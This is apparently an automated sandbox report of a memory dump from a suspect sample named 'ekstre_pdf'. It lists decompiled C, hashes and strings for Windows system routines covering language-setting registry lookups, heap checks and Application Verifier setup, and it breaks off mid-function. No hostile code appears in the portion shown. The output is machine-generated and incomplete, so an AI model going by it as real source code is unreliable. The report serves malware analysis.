Opcode ID: 38cf452af920728f16a0165690ceed2e18ffc53a865233db32fe97843b1bbad0
Instruction ID: 84fe7b971b2cfb324b3f74888f6fcd867d080f7a32d71a4ae164fc8c5698731e
Opcode Fuzzy Hash: 38cf452af920728f16a0165690ceed2e18ffc53a865233db32fe97843b1bbad0
Instruction Fuzzy Hash: A051BC76B04749DFEB04CFA4C684B8DBBF1BF44318F6042D9D8206B285EB709956CB85

Uniqueness

Uniqueness Score: -1.00%

Function 3405D02D Relevance: 10.2, Strings: 8, Instructions: 249
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E3405D02D(void* __ecx, intOrPtr* __edx, intOrPtr _a4) {
				char* _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				char _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v96;
				char* _v100;
				intOrPtr _v104;
				char _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char* _v124;
				signed int _v128;
				char _v132;
				char _v140;
				signed int _v144;
				char _v145;
				char _v148;
				signed int _v152;
				void* _v156;
				void* _v157;
				signed int _v160;
				void* _v161;
				signed int _v164;
				signed int _v168;
				void* _v172;
				void* _v180;
				void* _v188;
				intOrPtr _t111;
				void* _t128;
				void* _t160;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr* _t179;
				void* _t182;
				char _t184;
				signed int _t185;
				void* _t187;
				void* _t196;

				_t187 = (_t185 & 0xfffffff8) - 0x9c;
				_t160 = __ecx;
				_t179 = __edx;
				_v128 = 0;
				_v160 = 0;
				_v144 = 0;
				_v152 = 0;
				if(__edx == 0 || _a4 == 0) {
					_t182 = 0xc000000d;
					goto L11;
				} else {
					_v128 =  *__edx;
					E340A5050(__ecx,  &_v140, L"\\Registry\\Machine\\Software\\Policies\\Microsoft\\MUI\\Settings");
					_t184 = 0x18;
					_v132 = _t184;
					_v124 =  &_v148;
					_v128 = 0;
					_push( &_v132);
					_push(0x20019);
					_v120 = 0x40;
					_push( &_v168);
					_v116 = 0;
					_v112 = 0;
					if(E340A2AB0() >= 0) {
						_t182 = E3411ADD6(_v160, _a4,  &_v145,  &_v132);
						if(_t182 >= 0) {
							L11:
							if(_v160 != 0) {
								_push(_v160);
								E340A2A80();
							}
							if(_v144 != 0) {
								_push(_v144);
								E340A2A80();
							}
							if(_v152 != 0) {
								_push(_v152);
								E340A2A80();
							}
							if(_t182 < 0) {
								if(_t179 == 0) {
									goto L19;
								}
								_t162 = _v128;
								if( *_t179 == _t162) {
									goto L19;
								}
								if( *_t179 != 0) {
									E34073BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *_t179);
								}
								goto L44;
							} else {
								if( *_t179 != 0) {
									L19:
									return _t182;
								}
								_t111 = E3405DAA8(1);
								 *_t179 = _t111;
								if(_t111 == 0) {
									_t162 = _v128;
									_t182 = 0xc0000017;
									L44:
									 *_t179 = _t162;
								}
								goto L19;
							}
						}
						if(_t160 == 8) {
							 *((char*)(_t187 + 0x13)) = 0;
							if(E3411AD61(_v160, _t187 + 0x13) == 0 &&  *((char*)(_t187 + 0x13)) == 1) {
								_t160 = 4;
							}
						}
						_push(_v160);
						E340A2A80();
						_v164 = _v164 & 0x00000000;
						_t184 = 0x18;
					}
					_t170 = 0x2000000;
					if(E3405D736(0x2000000,  &_v152) < 0) {
						_v152 = _v152 & 0x00000000;
					}
					if(_t160 != 8) {
						if(_t160 != 4) {
							goto L25;
						}
						if(_v152 == 0) {
							_t128 = 0xc0000034;
						} else {
							E340A5050(_t170,  &_v140, L"Control Panel\\Desktop\\MuiCached\\MachineLanguageConfiguration");
							_v168 = _v168 & 0x00000000;
							_v44 = _v44 & 0x00000000;
							_v40 = _v40 & 0x00000000;
							_v56 = _v160;
							_v52 =  &_v148;
							_push( &_v60);
							_push(0x20019);
							_v60 = _t184;
							_push( &_v168);
							_v48 = 0x40;
							_t128 = E340A2AB0();
						}
						if(_t128 < 0) {
							E340A5050(_t170,  &_v140, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\MUI\\Settings\\LanguageConfiguration");
							_v168 = _v168 & 0x00000000;
							_v32 = _v32 & 0x00000000;
							 *(_t187 + 0xa0) =  *(_t187 + 0xa0) & 0x00000000;
							 *(_t187 + 0xa4) =  *(_t187 + 0xa4) & 0x00000000;
							_v28 =  &_v148;
							_push( &_v36);
							_push(0x20019);
							_v36 = _t184;
							_push( &_v168);
							 *((intOrPtr*)(_t187 + 0xa8)) = 0x40;
							_t182 = E340A2AB0();
							if(_t182 < 0) {
								goto L9;
							}
						}
						goto L25;
					} else {
						if(_v152 == 0) {
							L10:
							_t182 = 0;
							goto L11;
						}
						E340A5050(_t170,  &_v140, L"Software\\Policies\\Microsoft\\Control Panel\\Desktop");
						_v92 = _v92 & 0x00000000;
						_v88 = _v88 & 0x00000000;
						_v104 = _v160;
						_t164 = 0x40;
						_v100 =  &_v148;
						_push( &_v108);
						_push(0x20019);
						_v108 = _t184;
						_push( &_v152);
						_v96 = _t164;
						if(E340A2AB0() >= 0) {
							_t170 = _v144;
							_t182 = E3411ADD6(_v144, _a4,  &_v145,  &_v132);
							if(_t182 >= 0) {
								goto L11;
							}
							_t184 = 0x18;
						}
						E340A5050(_t170,  &_v140, L"Control Panel\\Desktop\\LanguageConfiguration");
						_v168 = _v168 & 0x00000000;
						_v68 = _v68 & 0x00000000;
						_v64 = _v64 & 0x00000000;
						 *((intOrPtr*)(_t187 + 0x64)) = _v160;
						 *((intOrPtr*)(_t187 + 0x68)) =  &_v148;
						_push( &_v84);
						_push(0x20019);
						_v84 = _t184;
						_push( &_v168);
						_v72 = _t164;
						_t182 = E340A2AB0();
						if(_t182 >= 0) {
							L25:
							_t182 = E3405D9A2(_v160, _t179, _a4);
							goto L11;
						} else {
							_t196 = _t182 - 0xc0000034;
							L9:
							if(_t196 != 0) {
								goto L11;
							}
							goto L10;
						}
					}
				}
			}

0x3405d035
0x3405d03f
0x3405d042
0x3405d044
0x3405d048
0x3405d04c
0x3405d050
0x3405d056
0x340ba5a1
0x00000000
0x3405d065
0x3405d067
0x3405d075
0x3405d07c
0x3405d081
0x3405d085
0x3405d08f
0x3405d093
0x3405d094
0x3405d09d
0x3405d0a5
0x3405d0a6
0x3405d0aa
0x3405d0b5
0x340ba52a
0x340ba52e
0x3405d194
0x3405d199
0x3405d19b
0x3405d19f
0x3405d19f
0x3405d1a9
0x340ba5ab
0x340ba5af
0x340ba5af
0x3405d1b4
0x3405d1b6
0x3405d1ba
0x3405d1ba
0x3405d1c1
0x340ba5bb
0x00000000
0x00000000
0x340ba5c1
0x340ba5c7
0x00000000
0x00000000
0x340ba5d0
0x340ba5df
0x340ba5df
0x00000000
0x3405d1c7
0x3405d1ca
0x3405d1de
0x3405d1e6
0x3405d1e6
0x3405d1cf
0x3405d1d4
0x3405d1d8
0x340ba5e6
0x340ba5ea
0x340ba5ef
0x340ba5ef
0x340ba5ef
0x00000000
0x3405d1d8
0x3405d1c1
0x340ba537
0x340ba541
0x340ba54d
0x340ba558
0x340ba558
0x340ba54d
0x340ba559
0x340ba55d
0x340ba562
0x340ba569
0x340ba569
0x3405d0bf
0x3405d0cc
0x340ba56f
0x340ba56f
0x3405d0d5
0x3405d1ec
0x00000000
0x00000000
0x3405d1fc
0x3405d2de
0x3405d202
0x3405d20c
0x3405d215
0x3405d21a
0x3405d222
0x3405d22a
0x3405d232
0x3405d23d
0x3405d23e
0x3405d247
0x3405d24e
0x3405d24f
0x3405d25a
0x3405d25a
0x3405d261
0x3405d26d
0x3405d272
0x3405d27b
0x3405d283
0x3405d28b
0x3405d293
0x3405d2a1
0x3405d2a2
0x3405d2ab
0x3405d2b2
0x3405d2b3
0x3405d2c3
0x3405d2c7
0x00000000
0x3405d2e5
0x3405d2c7
0x00000000
0x3405d0db
0x3405d0e0
0x3405d192
0x3405d192
0x00000000
0x3405d192
0x3405d0f0
0x3405d0f9
0x3405d0fe
0x3405d103
0x3405d10d
0x3405d10e
0x3405d116
0x3405d117
0x3405d120
0x3405d124
0x3405d125
0x3405d130
0x340ba580
0x340ba58f
0x340ba593
0x00000000
0x00000000
0x340ba59b
0x340ba59b
0x3405d140
0x3405d149
0x3405d14e
0x3405d153
0x3405d158
0x3405d160
0x3405d168
0x3405d169
0x3405d172
0x3405d176
0x3405d177
0x3405d180
0x3405d184
0x3405d2c9
0x3405d2d7
0x00000000
0x3405d18a
0x3405d18a
0x3405d190
0x3405d190
0x00000000
0x00000000
0x00000000
0x3405d190
0x3405d184
0x3405d0d5

Strings

\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3405D263
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3405D06F
@, xrefs: 3405D09D
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3405D202
@, xrefs: 3405D24F
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3405D0E6
@, xrefs: 3405D2B3
Control Panel\Desktop\LanguageConfiguration, xrefs: 3405D136

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-1356375266
Opcode ID: e3b9ee0f907b7bcd4b1e5b42b6aaa06c19653c732116333001462bf17fcc9b5b
Instruction ID: 9817884b0c926c204274e5450235a0b917bee611713f400c3f99cddda686a129
Opcode Fuzzy Hash: e3b9ee0f907b7bcd4b1e5b42b6aaa06c19653c732116333001462bf17fcc9b5b
Instruction Fuzzy Hash: 0FA138B1608305AFE721DF60C540B5FBBE8EF84759F0089AEE59896250E774DA08CF97

Uniqueness

Uniqueness Score: -1.00%

Function 3410F51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON

Download Yara Rule

Strings

Specified HeapBase (%p) != to BaseAddress (%p), xrefs: 3410F6B2
HEAP[%wZ]: , xrefs: 3410F552, 3410F597, 3410F5E3, 3410F648, 3410F696, 3410F6DD
Specified HeapBase (%p) is free or not writable, xrefs: 3410F6F8
Invalid ReserveSize parameter - %Ix, xrefs: 3410F56B
May not specify Lock parameter with HEAP_NO_SERIALIZE, xrefs: 3410F5FB
HEAP: , xrefs: 3410F55F, 3410F5A4, 3410F5F0, 3410F655, 3410F6A3, 3410F6EA
Specified HeapBase (%p) invalid, Status = %lx, xrefs: 3410F664
Invalid CommitSize parameter - %Ix, xrefs: 3410F5B2

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
API String ID: 0-2224505338
Opcode ID: 8e000bd9123613e245891700bf400b2b0f85d695ca30efcc1db4f7f03d670c19
Instruction ID: 3294009a46b5ac4d014dfb66f48af8b688c4e5273f945af149db658d216d8eef
Opcode Fuzzy Hash: 8e000bd9123613e245891700bf400b2b0f85d695ca30efcc1db4f7f03d670c19
Instruction Fuzzy Hash: 1F51E23A305A45EFE342CBA8C985F5A77B8FF09664F11C4D9F4009B232CAB5E940CE15

Uniqueness

Uniqueness Score: -1.00%

Function 340E8633 Relevance: 9.0, Strings: 7, Instructions: 259
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E340E8633(char __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				intOrPtr _v0;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				char _v28;
				char _v29;
				signed int _v30;
				char _v31;
				intOrPtr _v32;
				signed int _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t50;
				signed int _t51;
				signed int _t52;
				intOrPtr _t69;
				signed int _t76;
				signed int _t88;
				intOrPtr _t92;
				signed int _t97;
				signed int _t103;
				signed int _t121;
				intOrPtr* _t124;
				intOrPtr _t126;
				signed int _t127;
				signed int _t128;
				intOrPtr* _t130;

				_t115 = __edx;
				_t103 = __ecx;
				_t97 = 0;
				_v8 = __edx;
				_v31 = __ecx;
				_t126 =  *[fs:0x30];
				_v12 = _t126;
				_v24 = 0;
				_v28 = 0;
				_t50 = _a8;
				if(_t50 == 0) {
					_t121 = _a16;
					__eflags = _t121;
					if(_t121 != 0) {
						 *_t121 = 0;
						__eflags =  *(_t126 + 0x68) & 0x02000100;
						if(( *(_t126 + 0x68) & 0x02000100) == 0) {
							_t51 = E340E36EC();
							_t103 = _v31;
							__eflags = _t51;
							if(_t51 != 0) {
								_v28 = 2;
							}
						} else {
							_v28 = 1;
						}
						__eflags =  *(_t126 + 0x68) & 0x00000100;
						if(( *(_t126 + 0x68) & 0x00000100) != 0) {
							L35:
							_t52 = 0x48004;
							goto L36;
						} else {
							__eflags = _t103;
							if(_t103 != 0) {
								goto L35;
							}
							_t52 = 0;
							L36:
							_t127 = _a4;
							 *0x34155a74 = _t52;
							 *0x34155000 = 0;
							__eflags = _t127;
							if(_t127 == 0) {
								L40:
								__eflags = _v31;
								if(_v31 != 0) {
									 *0x34155238 = 1;
								}
								L42:
								__eflags = _t127;
								if(__eflags != 0) {
									__eflags = _t52 & 0x00000004;
									if((_t52 & 0x00000004) != 0) {
										E34056CC0(_t127, L"HandleTraces", 4, 0x341569d8, 4, 0);
									}
									E34056CC0(_t127, L"VerifierDebug", 4, 0x341569dc, 4, 0);
									E34056CC0(_t127, L"VerifierDlls", 1, 0x34155000, 0x200, 0);
								}
								_t116 = _v8;
								_t128 = E340E98B2(0x34031b98, _v8, __eflags, _t127, _a12, 0x34155260);
								__eflags = _t128;
								if(_t128 >= 0) {
									 *_t121 = 0x34155260;
									_t128 = E340E8FBB();
									__eflags = _t128;
									if(_t128 >= 0) {
										E34091D66(0x34031b98, _t116, 0);
										 *0x34159234 = _v32;
										E34091D66(0x34031b98, _t116, 1);
									}
								}
								L49:
								return _t128;
							}
							E34056CC0(_t127, L"VerifierFlags", 4,  &_v24, 4, 0);
							_t52 = _v48;
							__eflags = _t52;
							if(_t52 == 0) {
								_t52 =  *0x34155a74; // 0x0
								goto L40;
							}
							 *0x34155a74 = _t52;
							goto L42;
						}
					}
					_t128 = 0xc000000d;
					goto L49;
				}
				if(_t50 != 1) {
					L25:
					_t128 = _t97;
					goto L49;
				}
				 *0x34155244 = 0x34155240;
				 *0x34155240 = 0x34155240;
				_t128 = E3408FBC0(0x34155220, 0, 0);
				if(_t128 < 0) {
					goto L49;
				}
				if( *0x34159234 == 2) {
					_v29 = 0;
					_t128 = E34081934(0x34155308, 0,  &_v29);
					__eflags = _t128;
					if(_t128 < 0) {
						goto L49;
					}
					goto L25;
				}
				_push( *0x34155a74);
				_push( *((intOrPtr*)( *[fs:0x18] + 0x20)));
				_t69 =  *0x34155d8c; // 0x3c52ce0
				_t8 = _t69 + 0x30; // 0x3c51d08
				E340EEF10(0x5d, 0, "AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled\n",  *_t8);
				if(E340E9429(_t115) >= 0) {
					_t130 =  *0x34155240; // 0x0
					while(1) {
						__eflags = _t130 - 0x34155240;
						if(__eflags == 0) {
							break;
						}
						_t71 = E340E919C(_t97, _t130, 0x34155240, _t130, __eflags);
						__eflags = _t71;
						if(_t71 == 0) {
							_t128 = 0xc0000142;
							goto L49;
						} else {
							_t130 =  *_t130;
							continue;
						}
					}
					E340E8B5E(_t71);
					_t108 = 0x34031b88;
					_t128 = E3407F380(0x34031b88, 0, _t97,  &_v20, _t97);
					__eflags = _t128;
					if(_t128 < 0) {
						__eflags = _t128 - 0xc0000135;
						if(_t128 != 0xc0000135) {
							goto L49;
						}
						_t131 =  *0x34155278; // 0x0
						L15:
						_t76 = E3407CF00(_t108, 0, _t131, 0x34031b90, 0,  &_v16, 1, _v0);
						E34091D66(_t108, 0, 0);
						__eflags = _t76;
						if(_t76 >= 0) {
							_t88 =  *0x7ffe0330;
							_t108 = _t88 & 0x0000001f;
							__eflags = _t88 & 0x0000001f;
							asm("ror eax, cl");
							 *0x34159238 = _t88 ^ _v16;
							 *0x34159230 = 1;
						}
						 *0x34159231 = 1;
						 *0x34159232 = 1;
						E340E964A(E34091D66(_t108, 0, 1));
						_t124 =  *0x34155240; // 0x0
						_t97 = 0;
						__eflags = 0;
						while(1) {
							__eflags = _t124 - 0x34155240;
							if(_t124 == 0x34155240) {
								break;
							}
							_v30 = _t97;
							_t128 = E34081934( *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x10)) + 0x50)), 0,  &_v30);
							__eflags = _t128;
							if(_t128 < 0) {
								goto L49;
							}
							_t124 =  *_t124;
						}
						__eflags =  *0x341569dc & 0x00000008;
						if(( *0x341569dc & 0x00000008) != 0) {
							_push("AVRF: -*- final list of providers -*- \n");
							E340E8EB8(E3405B910());
						}
						E340E9818();
						E3406E580(3,  *((intOrPtr*)(_v12 + 8)), _t97, _t97,  &_v28);
						goto L25;
					}
					_t108 = _v20;
					_t131 =  *((intOrPtr*)(_v20 + 0x18));
					E3407D3E1(_t97, _v20,  *((intOrPtr*)(_v20 + 0x18)));
					goto L15;
				} else {
					_push( *((intOrPtr*)( *[fs:0x18] + 0x20)));
					_t92 =  *0x34155d8c; // 0x3c52ce0
					_t10 = _t92 + 0x30; // 0x3c51d08
					E340EEF10(0x5d, 0, "AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.\n",  *_t10);
					_t128 = 0xc0000001;
					 *( *[fs:0x30] + 0x68) =  *( *[fs:0x30] + 0x68) & 0xfffffeff;
					goto L49;
				}
			}

0x340e8633
0x340e8633
0x340e8642
0x340e8644
0x340e8648
0x340e864d
0x340e8654
0x340e8658
0x340e865c
0x340e8661
0x340e8663
0x340e8861
0x340e8864
0x340e8866
0x340e8872
0x340e8877
0x340e887e
0x340e8886
0x340e888b
0x340e888f
0x340e8891
0x340e8893
0x340e8893
0x340e8880
0x340e8880
0x340e8880
0x340e889b
0x340e88a2
0x340e88ac
0x340e88ac
0x00000000
0x340e88a4
0x340e88a4
0x340e88a6
0x00000000
0x00000000
0x340e88a8
0x340e88b1
0x340e88b1
0x340e88b6
0x340e88bb
0x340e88c2
0x340e88c4
0x340e88ef
0x340e88ef
0x340e88f4
0x340e88f6
0x340e88f6
0x340e88fc
0x340e88fc
0x340e88fe
0x340e8900
0x340e8902
0x340e8915
0x340e8915
0x340e892b
0x340e8943
0x340e8943
0x340e8948
0x340e895f
0x340e8961
0x340e8963
0x340e8965
0x340e8970
0x340e8972
0x340e8974
0x340e8978
0x340e8982
0x340e8987
0x340e8987
0x340e8974
0x340e898c
0x340e8994
0x340e8994
0x340e88d6
0x340e88db
0x340e88df
0x340e88e1
0x340e88ea
0x00000000
0x340e88ea
0x340e88e3
0x00000000
0x340e88e3
0x340e88a2
0x340e8868
0x00000000
0x340e8868
0x340e866c
0x340e885a
0x340e885a
0x00000000
0x340e885a
0x340e867e
0x340e8684
0x340e868f
0x340e8693
0x00000000
0x00000000
0x340e86a0
0x340e883f
0x340e8850
0x340e8852
0x340e8854
0x00000000
0x00000000
0x00000000
0x340e8854
0x340e86a6
0x340e86b2
0x340e86b5
0x340e86ba
0x340e86c5
0x340e86d4
0x340e8719
0x340e872e
0x340e872e
0x340e8730
0x00000000
0x00000000
0x340e8723
0x340e8728
0x340e872a
0x340e875e
0x00000000
0x340e872c
0x340e872c
0x00000000
0x340e872c
0x340e872a
0x340e8732
0x340e8740
0x340e874a
0x340e874c
0x340e874e
0x340e8768
0x340e876e
0x00000000
0x00000000
0x340e8774
0x340e877a
0x340e878e
0x340e8797
0x340e879c
0x340e879e
0x340e87a0
0x340e87ab
0x340e87ab
0x340e87ae
0x340e87b0
0x340e87b5
0x340e87b5
0x340e87bc
0x340e87c2
0x340e87cd
0x340e87d2
0x340e87d8
0x340e87d8
0x340e87da
0x340e87da
0x340e87e0
0x00000000
0x00000000
0x340e87ec
0x340e87f8
0x340e87fa
0x340e87fc
0x00000000
0x00000000
0x340e8802
0x340e8802
0x340e8806
0x340e880d
0x340e880f
0x340e881a
0x340e881a
0x340e881f
0x340e8834
0x00000000
0x340e8834
0x340e8750
0x340e8754
0x340e8757
0x00000000
0x340e86d6
0x340e86dc
0x340e86df
0x340e86e4
0x340e86ef
0x340e86fd
0x340e8711
0x00000000
0x340e8711

Strings

VerifierFlags, xrefs: 340E88D0
AVRF: -*- final list of providers -*- , xrefs: 340E880F
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 340E86BD
HandleTraces, xrefs: 340E890F
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 340E86E7
VerifierDlls, xrefs: 340E893D
VerifierDebug, xrefs: 340E8925

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 739b6515e5b84ea851933322d0485f743d85624be13a127b625d42e02343a2ff
Instruction ID: 55f203f04bfe26271a8798eb7dd48a2445bfbded011a76ea64aefe24539c75b9
Opcode Fuzzy Hash: 739b6515e5b84ea851933322d0485f743d85624be13a127b625d42e02343a2ff
Instruction Fuzzy Hash: 4291E072B05F11EFE311CB25CAC0BAA77E8EB44658F4504D9E9846B264C73098A68BD6

Uniqueness

Uniqueness Score: -1.00%

Function 3405F113 Relevance: 8.2, Strings: 6, Instructions: 684
COMMONCrypto

Download Yara Rule

C-Code - Quality: 65%

			E3405F113(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				void* _v56;
				intOrPtr _v60;
				void* _v68;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t242;
				signed char _t243;
				signed short _t245;
				signed int _t247;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				intOrPtr _t255;
				signed int _t265;
				signed int _t274;
				signed int _t277;
				intOrPtr _t278;
				signed int _t279;
				signed int _t302;
				signed short _t308;
				intOrPtr _t312;
				signed int _t323;
				signed int _t328;
				signed int _t331;
				intOrPtr _t332;
				signed int _t334;
				signed int _t336;
				signed int _t337;
				signed int _t340;
				intOrPtr _t341;
				intOrPtr _t350;
				signed int _t354;
				signed int _t357;
				intOrPtr _t358;
				signed int _t359;
				signed int _t378;
				signed short _t386;
				intOrPtr _t388;
				intOrPtr _t399;
				unsigned int _t415;
				signed int _t424;
				signed int _t427;
				signed int _t431;
				signed int _t439;
				signed short _t440;
				signed short _t443;
				signed int _t447;
				signed short* _t453;
				void* _t461;
				signed int _t472;
				signed int _t473;
				signed int _t475;
				intOrPtr _t476;
				signed int _t483;
				void* _t485;
				signed short _t496;
				unsigned int _t502;
				unsigned int _t504;
				signed int _t509;
				signed int _t514;
				signed short* _t524;
				signed int _t535;
				signed int _t537;
				signed int _t540;
				unsigned int _t545;
				signed int _t547;

				_t444 = __ecx;
				_t547 = __ecx;
				_t533 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x34156d48) != 0) {
					_push(_a4);
					_t509 = __edx;
					L11:
					_t242 = E34070B10(_t444, _t509);
					L7:
					return _t242;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x240)) =  *((intOrPtr*)(__ecx + 0x240)) - 1;
						_t424 = E3405F858(__edx,  &_v12,  &_v16);
						__eflags = _t424;
						if(_t424 != 0) {
							_t135 = _t547 + 0x244;
							 *_t135 =  *(_t547 + 0x244) - _v16;
							__eflags =  *_t135;
						}
					}
					_t439 = _a4;
					_t509 = _t533;
					_v44 = _t533;
					L14:
					_t243 =  *((intOrPtr*)(_t533 + 6));
					__eflags = _t243;
					if(_t243 == 0) {
						_t535 = _t547;
					} else {
						_t535 = (_t533 & 0xffff0000) - ((_t243 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t535;
					}
					_t245 = 7 + _t439 * 8 + _t509;
					_v12 = _t245;
					__eflags =  *_t245 - 3;
					if( *_t245 == 3) {
						_v16 = _t509 + _t439 * 8 + 8;
						E34059E69(_t547, _t509 + _t439 * 8 + 8);
						_t496 = _v16;
						_v28 =  *(_t496 + 0x10);
						 *((intOrPtr*)(_t535 + 0x30)) =  *((intOrPtr*)(_t535 + 0x30)) - 1;
						_v36 =  *(_t496 + 0x14);
						 *((intOrPtr*)(_t535 + 0x2c)) =  *((intOrPtr*)(_t535 + 0x2c)) - ( *(_t496 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t547 + 0x1f8)) =  *((intOrPtr*)(_t547 + 0x1f8)) +  *(_t496 + 0x14);
						 *((intOrPtr*)(_t547 + 0x208)) =  *((intOrPtr*)(_t547 + 0x208)) - 1;
						_t415 =  *(_t496 + 0x14);
						__eflags = _t415 - 0x7f000;
						if(_t415 >= 0x7f000) {
							 *(_t547 + 0x1fc) =  *(_t547 + 0x1fc) - _t415;
							_t415 =  *(_t496 + 0x14);
						}
						_t509 = _v44;
						_t439 = _t439 + (_t415 >> 3) + 0x20;
						__eflags = 1;
						_a4 = _t439;
						_v40 = 1;
					} else {
						_v36 = _v36 & 0x00000000;
					}
					__eflags =  *((intOrPtr*)(_t547 + 0x54)) -  *((intOrPtr*)(_t509 + 4));
					if( *((intOrPtr*)(_t547 + 0x54)) ==  *((intOrPtr*)(_t509 + 4))) {
						_v48 = _t509;
						_t247 = E3405BF92(_t535, _t509);
						__eflags = _a8;
						_v32 = _t247;
						if(_a8 != 0) {
							__eflags = _t247;
							if(_t247 == 0) {
								goto L20;
							}
						}
						__eflags =  *0x34156960 - 1;
						if( *0x34156960 >= 1) {
							__eflags = _t247;
							if(_t247 == 0) {
								_t399 =  *[fs:0x30];
								__eflags =  *(_t399 + 0xc);
								if( *(_t399 + 0xc) == 0) {
									_push("HEAP: ");
									E3405B910();
								} else {
									E3405B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E3405B910();
								__eflags =  *0x34155da8;
								if( *0x34155da8 == 0) {
									__eflags = 0;
									E3411FC95(_t439, 1, _t535, 0);
								}
								_t509 = _v44;
								_t439 = _a4;
							}
						}
						_t334 = _v40;
						_t472 = _t439 << 3;
						_v20 = _t472;
						_t473 = _t472 + _t509;
						_v24 = _t473;
						__eflags = _t334;
						if(_t334 == 0) {
							_t473 = _t473 + 0xfffffff0;
						}
						_t475 = (_t473 & 0xfffff000) - _v48;
						__eflags = _t475;
						_v52 = _t475;
						if(_t475 == 0) {
							__eflags =  *0x34156960 - 1;
							if( *0x34156960 < 1) {
								goto L9;
							}
							__eflags = _t334;
							L147:
							if(__eflags == 0) {
								goto L9;
							}
							_t255 =  *[fs:0x30];
							__eflags =  *(_t255 + 0xc);
							if( *(_t255 + 0xc) == 0) {
								_push("HEAP: ");
								E3405B910();
							} else {
								E3405B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E3405B910();
							__eflags =  *0x34155da8;
							if( *0x34155da8 == 0) {
								__eflags = 0;
								E3411FC95(_t439, 1, _t535, 0);
							}
							goto L153;
						} else {
							_t336 = E3405FABA( &_v48,  &_v52, 0x4000);
							__eflags = _t336;
							if(_t336 < 0) {
								L90:
								 *((intOrPtr*)(_t547 + 0x220)) =  *((intOrPtr*)(_t547 + 0x220)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									L154:
									_t509 = _v44;
									L9:
									_t444 = _t547;
									L10:
									_push(_t439);
									goto L11;
								}
